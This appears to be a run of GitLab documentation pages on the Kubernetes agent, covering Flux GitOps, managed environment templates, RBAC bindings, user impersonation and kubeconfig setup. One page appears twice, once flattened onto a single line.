apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: gitlab-ci-secrets-binding
  namespace: flux-system
subjects:
  - kind: Group
    name: gitlab:ci_job
    apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: secret-manager
  apiGroup: rbac.authorization.k8s.io
```

1. Let's enable CI/CD jobs to trigger a FluxCD reconciliation too. Create the `clusters/testing/gitlab-ci-job-flux-reconciler.yaml` file with the following content:

   ```yaml
   apiVersion: rbac.authorization.k8s.io/v1
   kind: ClusterRoleBinding
   metadata:
     name: ci-job-admin
   roleRef:
     name: flux-edit-flux-system
     kind: ClusterRole
     apiGroup: rbac.authorization.k8s.io
   subjects:
     - name: gitlab:ci_job
       kind: Group
   ---
   apiVersion: rbac.authorization.k8s.io/v1
   kind: ClusterRoleBinding
   metadata:
     name: ci-job-view
   roleRef:
     name: flux-view-flux-system
     kind: ClusterRole
     apiGroup: rbac.authorization.k8s.io
   subjects:
     - name: gitlab:ci_job
       kind: Group
   ```

For more information about CI/CD access, see [Using GitLab CI/CD with a Kubernetes cluster](ci_cd_workflow.md).

## Clean up resources

To finish, let's remove the deployed resources and delete the secret we used to access the container registry:

1. Delete the `clusters/testing/nginx.yaml` file. Flux will take care of removing the related resources from the cluster.
1. Stop the `container-registry-secret` environment. Stopping the environment will trigger its `on_stop` job, removing the secret from the cluster.

## Next steps

You can use the techniques in this tutorial to scale deployments across projects. The OCI image can be built in a different project, and as long as Flux is pointed at the right registry, Flux will retrieve it. This exercise is left for the reader.
For more practice, try changing the original Flux `GitRepository` in `/clusters/testing/flux-system/gotk-sync.yaml` to an `OCIRepository`.

Finally, see the following resources for more information about Flux and the GitLab integration with Kubernetes:

- [Enterprise considerations](enterprise_considerations.md) for the Kubernetes integration
- Use the agent for [operational container scanning](vulnerabilities.md)
- Use the agent to provide [remote workspaces](../../workspace/_index.md) for your engineers
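For the `OCIRepository` exercise suggested above, a rough sketch could look like the following. This is not the official migration path: the API version (`source.toolkit.fluxcd.io/v1beta2`, the version available in the Flux release used earlier in this tutorial), the artifact URL, and the reuse of the `gitlab-registry-auth` secret are all assumptions you would need to adapt.

```yaml
# Hypothetical OCIRepository to replace the bootstrapped GitRepository source.
# URL, tag, and secret name are assumptions based on this tutorial's setup.
apiVersion: source.toolkit.fluxcd.io/v1beta2
kind: OCIRepository
metadata:
  name: flux-system
  namespace: flux-system
spec:
  interval: 1m
  url: oci://registry.gitlab.example.org/my-group/optional-subgroup/my-repository/flux-manifests
  ref:
    tag: latest
  secretRef:
    name: gitlab-registry-auth
```

The `Kustomization` in `gotk-sync.yaml` would then need its `sourceRef.kind` changed from `GitRepository` to `OCIRepository`, and a pipeline job (like the `flux push artifact` job above) would have to publish the manifests to that URL.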
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: GitLab-managed Kubernetes resources
breadcrumbs:
  - doc
  - user
  - clusters
  - agent
url: https://docs.gitlab.com/user/clusters/managed_kubernetes_resources
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/managed_kubernetes_resources.md
date_extracted: 2025-08-13
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16130) in GitLab 17.9 [with a flag](../../../administration/feature_flags/_index.md) named `gitlab_managed_cluster_resources`. Disabled by default.
- Feature flag `gitlab_managed_cluster_resources` [removed](https://gitlab.com/gitlab-org/gitlab/-/issues/520042) in GitLab 18.1.

{{< /history >}}

Use GitLab-managed Kubernetes resources to provision Kubernetes resources with environment templates. An environment template can:

- Create namespaces and service accounts automatically for new environments
- Manage access permissions through role bindings
- Configure other required Kubernetes resources

When developers deploy applications, GitLab creates the resources based on the environment template.

## Configure GitLab-managed Kubernetes resources

Prerequisites:

- You must have a configured [GitLab agent for Kubernetes](install/_index.md).
- You have [authorized the agent](ci_cd_workflow.md#authorize-agent-access) to access relevant projects or groups.
- (Optional) You have configured [agent impersonation](ci_cd_workflow.md#restrict-project-and-group-access-by-using-impersonation) to prevent privilege escalations. The default environment template assumes you have configured [`ci_job` impersonation](ci_cd_workflow.md#impersonate-the-cicd-job-that-accesses-the-cluster).

### Turn on Kubernetes resource management

#### In your agent configuration file

To turn on resource management, modify the agent configuration file to include the required permissions:

```yaml
ci_access:
  projects:
    - id: <your_group/your_project>
      access_as:
        ci_job: {}
      resource_management:
        enabled: true
  groups:
    - id: <your_other_group>
      access_as:
        ci_job: {}
      resource_management:
        enabled: true
```

#### In your CI/CD jobs

To have the agent manage resources for an environment, specify the agent in your deployment job.
For example:

```yaml
deploy_review:
  stage: deploy
  script:
    - echo "Deploy a review app"
  environment:
    name: review/$CI_COMMIT_REF_SLUG
    kubernetes:
      agent: path/to/agent/project:agent-name
```

CI/CD variables can be used in the agent path. For more information, see [Where variables can be used](../../../ci/variables/where_variables_can_be_used.md).

### Create environment templates

Environment templates define what Kubernetes resources are created, updated, or removed.

The [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml) creates a `Namespace` and configures a `RoleBinding` for the CI/CD job.

To overwrite the default template, add a template configuration file called `default.yaml` in the agent directory:

```plaintext
.gitlab/agents/<agent-name>/environment_templates/default.yaml
```

#### Supported Kubernetes resources

The following Kubernetes resources (`kind`) are supported:

- `Namespace`
- `ServiceAccount`
- `RoleBinding`
- FluxCD Source Controller objects:
  - `GitRepository`
  - `HelmRepository`
  - `HelmChart`
  - `Bucket`
  - `OCIRepository`
- FluxCD Kustomize Controller objects:
  - `Kustomization`
- FluxCD Helm Controller objects:
  - `HelmRelease`
- FluxCD Notification Controller objects:
  - `Alert`
  - `Provider`
  - `Receiver`

#### Example environment template

The following example creates a namespace and grants a group administrator access to a cluster.
```yaml objects: - apiVersion: v1 kind: Namespace metadata: name: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}' - apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: bind-{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }} namespace: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}' subjects: - kind: Group apiGroup: rbac.authorization.k8s.io name: gitlab:project_env:{{ .project.id }}:{{ .environment.slug }} roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: admin # Resource lifecycle configuration apply_resources: on_start # Resources are applied when environment is started/restarted delete_resources: on_stop # Resources are removed when environment is stopped ``` ### Template variables Environment templates support limited variable substitution. The following variables are available: | Category | Variable | Description | Type | Default value when not set | |----------------|-------------------------------|---------------------------|---------|----------------------------| | Agent | `{{ .agent.id }}` | The agent ID. | Integer | N/A | | Agent | `{{ .agent.name }}` | The agent name. | String | N/A | | Agent | `{{ .agent.url }}` | The agent URL. | String | N/A | | Environment | `{{ .environment.id }}` | The environment ID. | Integer | N/A | | Environment | `{{ .environment.name }}` | The environment name. | String | N/A | | Environment | `{{ .environment.slug }}` | The environment slug. | String | N/A | | Environment | `{{ .environment.url }}` | The environment URL. | String | Empty string | | Environment | `{{ .environment.page_url }}` | The environment page URL. | String | N/A | | Environment | `{{ .environment.tier }}` | The environment tier. | String | N/A | | Project | `{{ .project.id }}` | The project ID. | Integer | N/A | | Project | `{{ .project.slug }}` | The project slug. | String | N/A | | Project | `{{ .project.path }}` | The project path. 
| String | N/A | | Project | `{{ .project.url }}` | The project URL. | String | N/A | | CI/CD Pipeline | `{{ .ci_pipeline.id }}` | The pipeline ID. | Integer | Zero | | CI/CD Job | `{{ .ci_job.id }}` | The CI/CD job ID. | Integer | Zero | | User | `{{ .user.id }}` | The user ID. | Integer | N/A | | User | `{{ .user.username }}` | The username. | String | N/A | All variables should be referenced using the double curly brace syntax, for example: `{{ .project.id }}`. See [`text/template`](https://pkg.go.dev/text/template) documentation for more information on the templating system used. ### Resource lifecycle management {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/507486) in GitLab 18.0. {{< /history >}} Use the following settings to configure when Kubernetes resources should be removed: ```yaml # Never delete resources delete_resources: never # Delete resources when environment is stopped delete_resources: on_stop ``` The default value is `on_stop`, which is specified in the [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml). ### Managed resource labels and annotations The resources created by GitLab use a series of labels and annotations for tracking and troubleshooting purposes. The following labels are defined on every resource created by GitLab. The values are intentionally left empty: - `agent.gitlab.com/id-<agent_id>: ""` - `agent.gitlab.com/project_id-<project_id>: ""` - `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>: ""` - `agent.gitlab.com/environment_slug-<gitlab_environment_slug>: ""` On every resource created by GitLab, an `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>` annotation is defined. 
The value of the annotation is a JSON object with the following keys: | Key | Description | |-----|--------------------------------------------------| | `environment_id` | The GitLab environment ID. | | `environment_name` | The GitLab environment name. | | `environment_slug` | The GitLab environment slug. | | `environment_url` | The link to the environment. Optional. | | `environment_page_url` | The link to the GitLab environment page. | | `environment_tier` | The GitLab environment deployment tier. | | `agent_id` | The agent ID. | | `agent_name` | The agent name. | | `agent_url` | The agent URL in the agent registration project. | | `project_id` | The GitLab project ID. | | `project_slug` | The GitLab project slug. | | `project_path` | The full GitLab project path. | | `project_url` | The link to the GitLab project. | | `template_name` | The name of the template used. | ## Troubleshooting Any errors related to managed Kubernetes resources can be found on: - The environment page in your GitLab project - The CI/CD job logs when using the feature in pipelines
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: GitLab-managed Kubernetes resources
breadcrumbs:
  - doc
  - user
  - clusters
  - agent
---

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16130) in GitLab 17.9 [with a flag](../../../administration/feature_flags/_index.md) named `gitlab_managed_cluster_resources`. Disabled by default.
- Feature flag `gitlab_managed_cluster_resources` [removed](https://gitlab.com/gitlab-org/gitlab/-/issues/520042) in GitLab 18.1.

{{< /history >}}

Use GitLab-managed Kubernetes resources to provision Kubernetes resources with environment templates. An environment template can:

- Create namespaces and service accounts automatically for new environments
- Manage access permissions through role bindings
- Configure other required Kubernetes resources

When developers deploy applications, GitLab creates the resources based on the environment template.

## Configure GitLab-managed Kubernetes resources

Prerequisites:

- You must have a configured [GitLab agent for Kubernetes](install/_index.md).
- You have [authorized the agent](ci_cd_workflow.md#authorize-agent-access) to access relevant projects or groups.
- (Optional) You have configured [agent impersonation](ci_cd_workflow.md#restrict-project-and-group-access-by-using-impersonation) to prevent privilege escalations. The default environment template assumes you have configured [`ci_job` impersonation](ci_cd_workflow.md#impersonate-the-cicd-job-that-accesses-the-cluster).
### Turn on Kubernetes resource management

#### In your agent configuration file

To turn on resource management, modify the agent configuration file to include the required permissions:

```yaml
ci_access:
  projects:
    - id: <your_group/your_project>
      access_as:
        ci_job: {}
      resource_management:
        enabled: true
  groups:
    - id: <your_other_group>
      access_as:
        ci_job: {}
      resource_management:
        enabled: true
```

#### In your CI/CD jobs

To have the agent manage resources for an environment, specify the agent in your deployment job. For example:

```yaml
deploy_review:
  stage: deploy
  script:
    - echo "Deploy a review app"
  environment:
    name: review/$CI_COMMIT_REF_SLUG
    kubernetes:
      agent: path/to/agent/project:agent-name
```

CI/CD variables can be used in the agent path. For more information, see [Where variables can be used](../../../ci/variables/where_variables_can_be_used.md).

### Create environment templates

Environment templates define what Kubernetes resources are created, updated, or removed.

The [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml) creates a `Namespace` and configures a `RoleBinding` for the CI/CD job.
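Because CI/CD variables can be used in the agent path, the deployment job can also resolve the agent dynamically. A minimal sketch, assuming a hypothetical project-level CI/CD variable named `AGENT_PATH` that holds a value such as `path/to/agent/project:agent-name`:

```yaml
deploy_review:
  stage: deploy
  script:
    - echo "Deploy a review app"
  environment:
    name: review/$CI_COMMIT_REF_SLUG
    kubernetes:
      # AGENT_PATH is a hypothetical CI/CD variable set in the project settings,
      # for example "path/to/agent/project:agent-name"
      agent: $AGENT_PATH
```

This can be useful when the same pipeline definition is reused across projects that deploy through different agents.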
To overwrite the default template, add a template configuration file called `default.yaml` in the agent directory:

```plaintext
.gitlab/agents/<agent-name>/environment_templates/default.yaml
```

#### Supported Kubernetes resources

The following Kubernetes resources (`kind`) are supported:

- `Namespace`
- `ServiceAccount`
- `RoleBinding`
- FluxCD Source Controller objects:
  - `GitRepository`
  - `HelmRepository`
  - `HelmChart`
  - `Bucket`
  - `OCIRepository`
- FluxCD Kustomize Controller objects:
  - `Kustomization`
- FluxCD Helm Controller objects:
  - `HelmRelease`
- FluxCD Notification Controller objects:
  - `Alert`
  - `Provider`
  - `Receiver`

#### Example environment template

The following example creates a namespace and grants a group administrator access to a cluster.

```yaml
objects:
  - apiVersion: v1
    kind: Namespace
    metadata:
      name: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}'
  - apiVersion: rbac.authorization.k8s.io/v1
    kind: RoleBinding
    metadata:
      name: bind-{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}
      namespace: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}'
    subjects:
      - kind: Group
        apiGroup: rbac.authorization.k8s.io
        name: gitlab:project_env:{{ .project.id }}:{{ .environment.slug }}
    roleRef:
      apiGroup: rbac.authorization.k8s.io
      kind: ClusterRole
      name: admin

# Resource lifecycle configuration
apply_resources: on_start # Resources are applied when environment is started/restarted
delete_resources: on_stop # Resources are removed when environment is stopped
```

### Template variables

Environment templates support limited variable substitution. The following variables are available:

| Category       | Variable                      | Description               | Type    | Default value when not set |
|----------------|-------------------------------|---------------------------|---------|----------------------------|
| Agent          | `{{ .agent.id }}`             | The agent ID.             | Integer | N/A                        |
| Agent          | `{{ .agent.name }}`           | The agent name.           | String  | N/A                        |
| Agent          | `{{ .agent.url }}`            | The agent URL.            | String  | N/A                        |
| Environment    | `{{ .environment.id }}`       | The environment ID.       | Integer | N/A                        |
| Environment    | `{{ .environment.name }}`     | The environment name.     | String  | N/A                        |
| Environment    | `{{ .environment.slug }}`     | The environment slug.     | String  | N/A                        |
| Environment    | `{{ .environment.url }}`      | The environment URL.      | String  | Empty string               |
| Environment    | `{{ .environment.page_url }}` | The environment page URL. | String  | N/A                        |
| Environment    | `{{ .environment.tier }}`     | The environment tier.     | String  | N/A                        |
| Project        | `{{ .project.id }}`           | The project ID.           | Integer | N/A                        |
| Project        | `{{ .project.slug }}`         | The project slug.         | String  | N/A                        |
| Project        | `{{ .project.path }}`         | The project path.         | String  | N/A                        |
| Project        | `{{ .project.url }}`          | The project URL.          | String  | N/A                        |
| CI/CD Pipeline | `{{ .ci_pipeline.id }}`       | The pipeline ID.          | Integer | Zero                       |
| CI/CD Job      | `{{ .ci_job.id }}`            | The CI/CD job ID.         | Integer | Zero                       |
| User           | `{{ .user.id }}`              | The user ID.              | Integer | N/A                        |
| User           | `{{ .user.username }}`        | The username.             | String  | N/A                        |

All variables should be referenced using the double curly brace syntax, for example: `{{ .project.id }}`. See the [`text/template`](https://pkg.go.dev/text/template) documentation for more information on the templating system used.

### Resource lifecycle management

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/507486) in GitLab 18.0.

{{< /history >}}

Use the following settings to configure when Kubernetes resources should be removed:

```yaml
# Never delete resources
delete_resources: never

# Delete resources when environment is stopped
delete_resources: on_stop
```

The default value is `on_stop`, which is specified in the [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml).
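For instance, a hypothetical template that provisions a per-environment `ServiceAccount` and keeps all resources after the environment is stopped could combine the `objects` list with `delete_resources: never`. The service account name is illustrative, not part of the default template:

```yaml
# .gitlab/agents/<agent-name>/environment_templates/default.yaml
objects:
  - apiVersion: v1
    kind: Namespace
    metadata:
      name: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}'
  - apiVersion: v1
    kind: ServiceAccount
    metadata:
      # "deploy-sa" is an illustrative name
      name: deploy-sa
      namespace: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}'

apply_resources: on_start
delete_resources: never # keep the namespace and service account after the environment stops
```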
### Managed resource labels and annotations

The resources created by GitLab use a series of labels and annotations for tracking and troubleshooting purposes.

The following labels are defined on every resource created by GitLab. The values are intentionally left empty:

- `agent.gitlab.com/id-<agent_id>: ""`
- `agent.gitlab.com/project_id-<project_id>: ""`
- `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>: ""`
- `agent.gitlab.com/environment_slug-<gitlab_environment_slug>: ""`

On every resource created by GitLab, an `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>` annotation is defined. The value of the annotation is a JSON object with the following keys:

| Key | Description |
|-----|--------------------------------------------------|
| `environment_id` | The GitLab environment ID. |
| `environment_name` | The GitLab environment name. |
| `environment_slug` | The GitLab environment slug. |
| `environment_url` | The link to the environment. Optional. |
| `environment_page_url` | The link to the GitLab environment page. |
| `environment_tier` | The GitLab environment deployment tier. |
| `agent_id` | The agent ID. |
| `agent_name` | The agent name. |
| `agent_url` | The agent URL in the agent registration project. |
| `project_id` | The GitLab project ID. |
| `project_slug` | The GitLab project slug. |
| `project_path` | The full GitLab project path. |
| `project_url` | The link to the GitLab project. |
| `template_name` | The name of the template used. |

## Troubleshooting

Any errors related to managed Kubernetes resources can be found on:

- The environment page in your GitLab project
- The CI/CD job logs when using the feature in pipelines
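When troubleshooting on the cluster side, it can help to know what this metadata looks like on a managed resource. A namespace created by GitLab might carry labels and an annotation roughly like the following sketch; the IDs, slug, and the subset of annotation keys shown are invented for illustration:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: review-app-123-42
  labels:
    # agent ID 42, project ID 123, environment slug "review-app" (all hypothetical)
    agent.gitlab.com/id-42: ""
    agent.gitlab.com/project_id-123: ""
    agent.gitlab.com/env-review-app-123-42: ""
    agent.gitlab.com/environment_slug-review-app: ""
  annotations:
    agent.gitlab.com/env-review-app-123-42: >-
      {"environment_id": 7, "environment_name": "review/app",
       "environment_slug": "review-app", "agent_id": 42,
       "agent_name": "my-agent", "project_id": 123,
       "template_name": "default"}
```

Filtering by these labels (for example, with a `kubectl` label selector) is a convenient way to find everything a given agent or environment created.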
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Grant users Kubernetes access
breadcrumbs:
  - doc
  - user
  - clusters
  - agent
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated
- Status: Beta

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/390769) in GitLab 16.1, with [flags](../../../administration/feature_flags/_index.md) named `environment_settings_to_graphql`, `kas_user_access`, `kas_user_access_project`, and `expose_authorized_cluster_agents`. This feature is in [beta](../../../policy/development_stages_support.md#beta).
- Feature flag `environment_settings_to_graphql` [removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/124177) in GitLab 16.2.
- Feature flags `kas_user_access`, `kas_user_access_project`, and `expose_authorized_cluster_agents` [removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/125835) in GitLab 16.2.
- The [limit of agent connection sharing was raised](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/149844) from 100 to 500 in GitLab 17.0.
- The `user_access` parameter `access_as` [was made optional](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/merge_requests/2749) in GitLab 18.3. Defaults to agent impersonation.

{{< /history >}}

As an administrator of Kubernetes clusters in an organization, you can grant Kubernetes access to members of a specific project or group. Granting access also activates [the Dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md) for a project or group.

For GitLab Self-Managed instances, make sure you either:

- Host your GitLab instance and [KAS](../../../administration/clusters/kas.md) on the same domain.
- Host KAS on a subdomain of GitLab. For example, GitLab on `gitlab.com` and KAS on `kas.gitlab.com`.

## Configure Kubernetes access

Configure access when you want to grant users access to a Kubernetes cluster.

Prerequisites:

- The agent for Kubernetes is installed in the Kubernetes cluster.
- You must have the Developer role or higher.

To configure access:

- In the agent configuration file, define a `user_access` keyword with the following parameters:
  - `projects`: A list of projects whose members should have access. You can authorize up to 500 projects.
  - `groups`: A list of groups whose members should have access. You can authorize up to 500 groups. Access is granted to the group and all its descendants.
  - `access_as`: For access with agent identity, the value is `{ agent: {...} }`.

After you configure access, requests are forwarded to the API server using the agent service account. For example:

```yaml
# .gitlab/agents/my-agent/config.yaml
user_access:
  access_as:
    agent: {}
  projects:
    - id: group-1/project-1
    - id: group-2/project-2
  groups:
    - id: group-2
    - id: group-3/subgroup
```

## Configure access with user impersonation

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can grant access to a Kubernetes cluster and transform requests into impersonation requests for authenticated users.

Prerequisites:

- The agent for Kubernetes is installed in the Kubernetes cluster.
- You must have the Developer role or higher.

To configure access with user impersonation:

- In the agent configuration file, define a `user_access` keyword with the following parameters:
  - `projects`: A list of projects whose members should have access.
  - `groups`: A list of groups whose members should have access.
  - `access_as`: For user impersonation, the value is `{ user: {...} }`.

After you configure access, requests are transformed into impersonation requests for authenticated users.
### User impersonation workflow

The installed `agentk` impersonates the given users as follows:

- `UserName` is `gitlab:user:<username>`
- `Groups` is:
  - `gitlab:user`: Common to all requests coming from GitLab users.
  - `gitlab:project_role:<project_id>:<role>` for each role in each authorized project.
  - `gitlab:group_role:<group_id>:<role>` for each role in each authorized group.
- `Extra` carries additional information about the request:
  - `agent.gitlab.com/id`: The agent ID.
  - `agent.gitlab.com/username`: The username of the GitLab user.
  - `agent.gitlab.com/config_project_id`: The agent configuration project ID.
  - `agent.gitlab.com/access_type`: One of `personal_access_token` or `session_cookie`. Ultimate only.

Only projects and groups listed directly under `user_access` in the configuration file are impersonated. For example:

```yaml
# .gitlab/agents/my-agent/config.yaml
user_access:
  access_as:
    user: {}
  projects:
    - id: group-1/project-1 # group_id=1, project_id=1
    - id: group-2/project-2 # group_id=2, project_id=2
  groups:
    - id: group-2 # group_id=2
    - id: group-3/subgroup # group_id=3, group_id=4
```

In this configuration:

- If a user is a member of only `group-1`, they receive only the Kubernetes RBAC groups `gitlab:project_role:1:<role>`.
- If a user is a member of `group-2`, they receive both Kubernetes RBAC groups:
  - `gitlab:project_role:2:<role>`
  - `gitlab:group_role:2:<role>`

### RBAC authorization

Impersonated requests require a `ClusterRoleBinding` or `RoleBinding` to identify the resource permissions inside Kubernetes. See [RBAC authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) for the appropriate configuration.
For example, if you allow maintainers in the `awesome-org/deployment` project (ID: 123) to read the Kubernetes workloads, you must add a `ClusterRoleBinding` resource to your Kubernetes configuration:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: my-cluster-role-binding
roleRef:
  name: view
  kind: ClusterRole
  apiGroup: rbac.authorization.k8s.io
subjects:
  - name: gitlab:project_role:123:maintainer
    kind: Group
```

## Access a cluster with the Kubernetes API

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/131144) in GitLab 16.4.

{{< /history >}}

You can configure an agent to allow GitLab users to access a cluster with the Kubernetes API.

Prerequisites:

- You have an agent configured with the `user_access` entry.

### Configure local access with the GitLab CLI (recommended)

You can use the [GitLab CLI `glab`](../../../editor_extensions/gitlab_cli/_index.md) to create or update a Kubernetes configuration file to access the agent Kubernetes API.

Use `glab cluster agent` commands to manage cluster connections:

1. View a list of all the agents associated with your project:

   ```shell
   glab cluster agent list --repo '<group>/<project>'

   # If your current working directory is the Git repository of the project with the agent, you can omit the --repo option:
   glab cluster agent list
   ```

1. Use the numerical agent ID presented in the first column of the output to update your `kubeconfig`:

   ```shell
   glab cluster agent update-kubeconfig --repo '<group>/<project>' --agent '<agent-id>' --use-context
   ```

1. Verify the update with `kubectl` or your preferred Kubernetes tooling:

   ```shell
   kubectl get nodes
   ```

The `update-kubeconfig` command sets `glab cluster agent get-token` as a [credential plugin](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#client-go-credential-plugins) for Kubernetes tools to retrieve a token.
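Conceptually, the credential plugin mechanism means the kubeconfig user entry runs `glab` to fetch a token on demand. A rough, hypothetical sketch of what such an entry can look like; the exact names and arguments that `update-kubeconfig` writes may differ, so inspect your own kubeconfig rather than copying this:

```yaml
# Hypothetical user entry as written into the kubeconfig (agent ID 42 is a placeholder)
users:
  - name: agent:42
    user:
      exec:
        apiVersion: client.authentication.k8s.io/v1
        command: glab
        args:
          - cluster
          - agent
          - get-token
        interactiveMode: Never
```

Because the token is produced by an `exec` plugin, no long-lived credential is stored in the kubeconfig itself.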
The `get-token` command creates and returns a personal access token that is valid until the end of the current day. Kubernetes tools cache the token until it expires, the API returns an authorization error, or the process exits. Expect all subsequent calls to your Kubernetes tooling to create a new token.

The `glab cluster agent update-kubeconfig` command supports a number of command line flags. You can view all supported flags with `glab cluster agent update-kubeconfig --help`. Some examples:

```shell
# When the current working directory is the Git repository where the agent is registered, the --repo / -R flag can be omitted
glab cluster agent update-kubeconfig --agent '<agent-id>'

# When the --use-context option is specified, the `current-context` of the kubeconfig file is changed to the agent context
glab cluster agent update-kubeconfig --agent '<agent-id>' --use-context

# The --kubeconfig flag can be used to specify an alternative kubeconfig path
glab cluster agent update-kubeconfig --agent '<agent-id>' --kubeconfig ~/gitlab.kubeconfig
```

### Configure local access manually using a personal access token

You can configure access to a Kubernetes cluster using a long-lived personal access token:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Operate > Kubernetes clusters** and retrieve the numerical ID of the agent you want to access. You need the ID to construct the full API token.
1. Create a [personal access token](../../profile/personal_access_tokens.md) with the `k8s_proxy` scope. You need the access token to construct the full API token.
1. Construct `kubeconfig` entries to access the cluster:
   1. Make sure that the proper `kubeconfig` is selected. For example, you can set the `KUBECONFIG` environment variable.
   1. Add the GitLab KAS proxy cluster to the `kubeconfig`:

      ```shell
      kubectl config set-cluster <cluster_name> --server "https://kas.gitlab.com/k8s-proxy"
      ```

      The `server` argument points to the KAS address of your GitLab instance. On GitLab.com, this is `https://kas.gitlab.com/k8s-proxy`. You can get the KAS address of your instance when you register an agent.

   1. Use your numerical agent ID and personal access token to construct an API token:

      ```shell
      kubectl config set-credentials <gitlab_user> --token "pat:<agent-id>:<token>"
      ```

   1. Add the context to combine the cluster and the user:

      ```shell
      kubectl config set-context <gitlab_agent> --cluster <cluster_name> --user <gitlab_user>
      ```

   1. Activate the new context:

      ```shell
      kubectl config use-context <gitlab_agent>
      ```

1. Check that the configuration works:

   ```shell
   kubectl get nodes
   ```

The configured user can access your cluster with the Kubernetes API.

## Related topics

- [Architectural blueprint](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kubernetes_user_access.md)
- [Dashboard for Kubernetes](https://gitlab.com/groups/gitlab-org/-/epics/2493)
https://docs.gitlab.com/user/clusters/enterprise_considerations
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/enterprise_considerations.md
2025-08-13
doc/user/clusters/agent
enterprise_considerations.md
Deploy
Environments
Best practices for using the GitLab integration with Kubernetes
The agent for Kubernetes and Flux together offer the best experience when deploying to Kubernetes through GitOps. GitLab recommends using GitOps (also known as pull-based deployment) for deployments. However, your company might not be able to transition to GitOps, or you might have certain (typically non-production) reasons to use a pipeline-based approach. This page describes best practices for using GitOps for enterprise, with some considerations for pipeline-based deployments. For a description of the advantages of GitOps, see [the OpenGitOps initiative](https://opengitops.dev/about). ## GitOps - Although [Get started connecting a Kubernetes cluster to GitLab](getting_started.md) shows how to install Flux using the Flux CLI, to scale and automate Flux deployments you should do either of the following: - Use the [Flux Operator](https://github.com/controlplaneio-fluxcd/flux-operator). - Install with [Terraform](https://registry.terraform.io/providers/fluxcd/flux/latest/docs) or [OpenTofu](https://search.opentofu.org/provider/fluxcd/flux/latest). - Configure Flux with [multi-tenancy lockdown](https://fluxcd.io/flux/installation/configuration/multitenancy/). - For scaling, Flux supports [vertical](https://fluxcd.io/flux/installation/configuration/vertical-scaling/) and [horizontal sharding](https://fluxcd.io/flux/installation/configuration/sharding/). - For Flux-specific guidance, see the [Flux guides](https://fluxcd.io/flux/guides/) in the Flux documentation. - To simplify maintenance, you should run a single GitLab agent for Kubernetes installation per cluster. You can share the agent connection with impersonation features across the GitLab domain. - Consider using the Flux `OCIRepository` for storing and retrieving manifests. You can use GitLab pipelines to build and push the OCI images to the container registry. - To shorten the feedback loop, trigger an immediate GitOps reconciliation from the related GitLab pipeline. 
- You should sign generated OCI images, and deploy only images signed and verified by Flux.
- Be sure to regularly rotate the keys used by Flux to access the manifests. You should also regularly rotate your agent-registration token.

### OCI containers

When you use OCI containers instead of Git repositories, the source of truth for the manifests is still the Git repository. You can think of the OCI container as a caching layer between the Git repository and the cluster.

There are several benefits to using OCI containers:

- OCI was designed for scalability. Although the GitLab Git repositories scale well, they were not designed for this use case.
- A single Git repository can be the source of several OCI containers, each packaging a small set of manifests. This way, if you need to retrieve a set of manifests, you don't need to download the whole Git repository.
